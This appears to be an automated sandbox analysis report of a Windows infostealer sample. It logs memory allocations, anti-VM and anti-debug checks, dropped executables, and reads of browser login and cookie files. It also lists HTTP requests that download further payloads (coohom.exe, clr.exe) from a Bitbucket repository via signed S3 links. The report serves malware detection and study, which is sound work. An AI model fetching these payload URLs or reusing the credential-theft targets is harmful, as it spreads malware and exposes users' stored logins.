__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4411312 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 59	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: swnetwork+0xf054 @ 0x40f054 swnetwork+0xf0a0 @ 0x40f0a0 swnetwork+0x1fa2 @ 0x401fa2 exception.instruction_r: 66 0f 7f 47 50 66 0f 7f 47 60 66 0f 7f 47 70 8d exception.symbol: swnetwork+0xefff exception.address: 0x40efff exception.module: swnetwork.exe exception.exception_code: 0xc0000005 exception.offset: 61439 registers.esp: 1636940 registers.edi: 4415408 registers.eax: 4350256 registers.ebp: 1636944 registers.edx: 30 registers.ebx: 0 registers.esi: 30933064 registers.ecx: 27	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: 0x4885f8a 0x4882031 0x4881639 0x48814e8 0x488047b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6f581838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6f581737 mscorlib+0x2d36ad @ 0x64e836ad mscorlib+0x308f2d @ 0x64eb8f2d 0x4880398 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6f581838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6f581737 mscorlib+0x2d3711 @ 0x64e83711 mscorlib+0x308f2d @ 0x64eb8f2d mscorlib+0x3133fd @ 0x64ec33fd mscorlib+0x9873b1 @ 0x655373b1 mscorlib+0x97b352 @ 0x6552b352 DllUnregisterServerInternal-0x7666 clr+0x2a8e @ 0x6f502a8e DllGetClassObjectInternal+0x37c9b CorDllMainForThunk-0x54860 clr+0xfcd14 @ 0x6f5fcd14 0x1efa062 swnetwork+0x2403 @ 0x402403 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4886019 registers.esp: 1633960 registers.edi: 38330156 registers.eax: 0 registers.ebp: 1633984 registers.edx: 3310032 registers.ebx: 36653776 registers.esi: 38363616 registers.ecx: 0	1
__exception__ March 22, 2021, 5:35 p.m.	stacktrace: 0x7b337df 0x7b334c9 0x7b3306b 0x4886d91 0x4881643 0x48814e8 0x488047b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6f581838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6f581737 mscorlib+0x2d36ad @ 0x64e836ad mscorlib+0x308f2d @ 0x64eb8f2d 0x4880398 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6f502652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6f51264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6f581838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6f581737 mscorlib+0x2d3711 @ 0x64e83711 mscorlib+0x308f2d @ 0x64eb8f2d mscorlib+0x3133fd @ 0x64ec33fd mscorlib+0x9873b1 @ 0x655373b1 mscorlib+0x97b352 @ 0x6552b352 DllUnregisterServerInternal-0x7666 clr+0x2a8e @ 0x6f502a8e DllGetClassObjectInternal+0x37c9b CorDllMainForThunk-0x54860 clr+0xfcd14 @ 0x6f5fcd14 0x1efa062 swnetwork+0x2403 @ 0x402403 exception.instruction_r: 8b 50 04 03 d1 b9 2e 4d bb 64 e8 ea e0 3b fa 8b exception.instruction: mov edx, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7b3411b registers.esp: 1633428 registers.edi: 38892172 registers.eax: 0 registers.ebp: 1633488 registers.edx: 37980 registers.ebx: 38872584 registers.esi: 38892060 registers.ecx: 20	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (5 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET https://api.ip.sb/geoip
suspicious_features	GET method with no useragent header	suspicious_request	GET https://bitbucket.org/mminminminmin05/testtest/downloads/coohom.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/63bdc9c9-25c5-4481-bdd4-24e8b322c041/coohom.exe?Signature=3v5pHGYDnTWICGm2HBSijwU5Vm4%3D&Expires=1616404050&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj&response-content-disposition=attachment%3B%20filename%3D%22coohom.exe%22
suspicious_features	GET method with no useragent header	suspicious_request	GET https://bitbucket.org/mminminminmin05/testtest/downloads/clr.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/f827393c-b39f-450b-8854-d15458efc0cd/clr.exe?Signature=iv2dAOS7O5uDtcuy6pQLlA38CIQ%3D&Expires=1616403908&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=navAx2o.B364539FO2C5fA3kQTj_uTIH&response-content-disposition=attachment%3B%20filename%3D%22clr.exe%22

Performs some HTTP requests (5 events)

request	GET https://api.ip.sb/geoip
request	GET https://bitbucket.org/mminminminmin05/testtest/downloads/coohom.exe
request	GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/63bdc9c9-25c5-4481-bdd4-24e8b322c041/coohom.exe?Signature=3v5pHGYDnTWICGm2HBSijwU5Vm4%3D&Expires=1616404050&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj&response-content-disposition=attachment%3B%20filename%3D%22coohom.exe%22
request	GET https://bitbucket.org/mminminminmin05/testtest/downloads/clr.exe
request	GET https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/f827393c-b39f-450b-8854-d15458efc0cd/clr.exe?Signature=iv2dAOS7O5uDtcuy6pQLlA38CIQ%3D&Expires=1616403908&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=navAx2o.B364539FO2C5fA3kQTj_uTIH&response-content-disposition=attachment%3B%20filename%3D%22clr.exe%22

Allocates read-write-execute memory (usually to unpack itself) (50 out of 179 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00420000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00450000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00530000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00531000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04881000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04886000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04887000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:34 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04888000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04889000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0488a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0488b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0488c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0488d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0488e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0488f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04821000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04822000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04823000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04824000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 4244 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04825000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 2228224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00900000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f501000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f502000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00442000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00475000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 22, 2021, 5:35 p.m.	process_identifier: 8620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00466000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW March 22, 2021, 5:35 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13282254848 root_path: C:\ProgramData\ total_number_of_bytes: 34252779520	1	1	0

Steals private information from local Internet browsers (9 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Chromium\User Data
file	C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file	C:\Users\test22\AppData\Local\Nichrome\User Data
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Temp\srvs.exe
file	C:\Users\test22\AppData\Local\Temp\swnetwork.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk

Creates a shortcut to an executable file (16 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\한컴오피스 한글 2010.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditPlus.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chrome.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\한컴 사전.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\uacwev.bat""

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\srvs.exe
file	C:\Users\test22\AppData\Local\Temp\swnetwork.exe

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\is-5IS72.tmp\srvs.tmp
file	C:\Users\test22\AppData\Local\Temp\swnetwork.exe
file	C:\Users\test22\AppData\Local\Temp\srvs.exe

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 22, 2021, 5:35 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000d5600', u'virtual_address': u'0x00002000', u'entropy': 7.54619729924383, u'name': u'.text', u'virtual_size': u'0x000d54b4'}

entropy

7.54619729924

description

A section with a high entropy has been found

entropy

0.750989881214

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 22, 2021, 5:35 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW March 22, 2021, 5:35 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (12 events)

description	Listen for incoming communication	rule	network_tcp_listen
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Detection of Virtual Appliances through the use of WMI for use of evasion.	rule	WMI_VM_Detect
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 83 events)

Time & API	Arguments	Status	Return
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000006ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: 7-Zip base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: AddressBook base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: Connection Manager base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: DirectDrawEx base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExW March 22, 2021, 5:35 p.m.	regkey_r: EditPlus base_handle: 0x000006ec key_handle: 0x000006f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
